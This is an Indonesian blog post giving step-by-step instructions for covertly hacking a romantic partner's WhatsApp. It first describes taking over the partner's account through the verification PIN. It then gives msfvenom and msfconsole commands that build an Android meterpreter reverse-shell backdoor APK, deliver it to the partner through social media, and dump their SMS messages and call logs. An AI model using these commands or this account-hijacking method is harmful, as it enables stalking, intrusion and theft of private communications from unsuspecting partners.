Friday, September 27, 2019

Cara Hack WhatsApp Pacar dengan aplikasi Termux 100% berhasil

Cara Hack WhatsApp Pacar



WhatsApp atau yang lebih kita kenal dengan WA merupakan sebuah aplikasi media sosial yang sangat populer dan bahkan bisa dibilang menjadi pesaing terberat dari medsos lainnya seperti facebook dan instagram. Di dalam aplikasi ini kita bisa melakukan komunikasi dengan cara chat seperti mengirim gambar, video bahkan bisa juga melakukan panggilan. Pernah terbesik tidak, bagi kalian yang sekarang punya pacar dan ingin tahu kebiasan dia kalau sedang pakai WA tanpa harus ketahuan oleh pacar kalian. Maka dari itu kalian mencari cara Hack akun Wa nya, ini dia ada salah satu aplikasi yang bisa membantu anda.
Yaitu termux

Ada cara sederhana yang bisa kalian lakukan untuk bisa melihat aktifitas pasangan kalian saat menggunakan WhatsApp tanpa harus menyentuh HP pacar kalian. Dengan menggunakan aplikasi Termux, yang merupakan sebuah aplikas open source. Bagi kalian para pengguna android, untuk bisa menjalankan aplikasi ini dibutuhkan android dengan 32 dan 64 bit dengan menimal OS android Lolipop 5.0. Bisa juga dengan akses root atau tanpa root. Aplikasi ini tergolong aman, untuk digunakan.

Dan saran dari saya, gunakan aplikasi ini untuk hal yang positif supaya hasilnya juga baik untuk kalian. Jika kalian menggunakan untuk hal yang tidak baik dan parahnya lagi pacar kalian tau kalau akun Wa nya sudah di hack oleh kalian, maka akibatnya kepercayaan dari pacar kalian akan mulai memudar seiring dengan berjalannya waktu. Jadi, alangkah baiknya untuk berfikir terlebih dahulu. Apa yakin kalian akan melakukan hal ini, karena dampak yang akan diterima. Bisa jadi kalian akan kehilangan dia.

Di sebuah hubungan, pasangan kita terkadang perlu yang namanya sebuah hiburan atau candaan dengan teman yang sudah lama dia kenal. Suatu kecemburuan bisa muncul karena hal seperti itu, setelah itu rasa curiga mulai menghampiri saat kita tau bahwa temannya tersebut berlawanan jenis.

Jika kalian sudah mantap, tanpa harus befikir panjang lagi. Silahkan untuk mengikuti cara Hack WA orang , bahkan oleh orang lain dengan mudah tanpa ketahuan. Hal pertama yang harus dilakukan, pastikan aplikasi WhatsApp di android anda sudah terupdate paling baru. Agar bisa berkerja secara baik dan lancar, perlu diingat jangan dipaksa untuk menggunakan versi lama, karena kegagalan adalah akibatnya.

Disini kami memberikan 2 tips atau cara, bisa menggunakan aplikasi dan juga bisa tanpa aplikasi. Tinggal kalian pilih mana yang akan kalian coba terlebih dahulu.
Cara Hack WhatsApp pacar Tanpa Aplikasi
Pertama pastikan aplikasi WA kalian update ke versi terbaru
Setelah itu siapkan Email atau nomer Hp pacar kalian
Selanjutnya kalian bisa langsung masuk ke aplikasi whatsapp dengan menggunakan nomer HP tersebut
Lakukan sistem Set Up
Disaat WA melakukan panggilan, silahkan angkat telepon
PIN juga akan dikirim ke nomer tujuan
Dan selamat kalian berhasil menyadap nomor WA Pacar


Cara Hack WhatsApp pacar dengan aplikasi Termux:
Pertama, silankan anda download terlebih dahulu aplikasi termux menggunakan google playstore atau di app store.

Setelah itu, lalu buka dan kemudian ketik ifconfig untuk bisa melihat alamat IP anda sendiri.
Langkah berikutnya, kalian ketikan msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk (LHOST ganti dengan alamat ip kalian).
Saat file backdoor sudah jadi, kalian bisa cek atau mencarinya dalam FILE >HOME >hack.apk
Selanjutnya silahkan kalian buka lagi aplikasi termux dan ketikan perintah dibawah ini dan pastikan datanya sama seperti file backdoor.
          msfconsole
          use exploit/multi/handler
          set payload android/meterpreter/reverse_tcp
          set lhost 192.168.43.166
          set lport 4444
          exploit
     —Selanjutnya silahkan mengirim file hack.apk atau backdoor tersebut pada ponsel terget hack,               bisa menggunakan via wa, instagram, Messenger FB atau yang lainnya.
  —Saat target berhasil menginstall apk tersebut, maka kalian bisa lihat meterpreternya.
     —Lalu ketik dump_sms untuk melihat riwayat pesan
     —Ketik dump_callog untuk bisa melihat histori panggilan
   —Dan selesai dan kalian sudah bisa berhasil melakukan penyadapan WA pacar kalian sendiri.
Itulah cara hack wa dan sudah terbukti berhasil dan work, dan bagi kalian yang masih bingung. Bisa search di google belajar termux untuk pemula, sudah banyak situs yang membahasnya.
 selamat mencoba.

No comments:

Post a Comment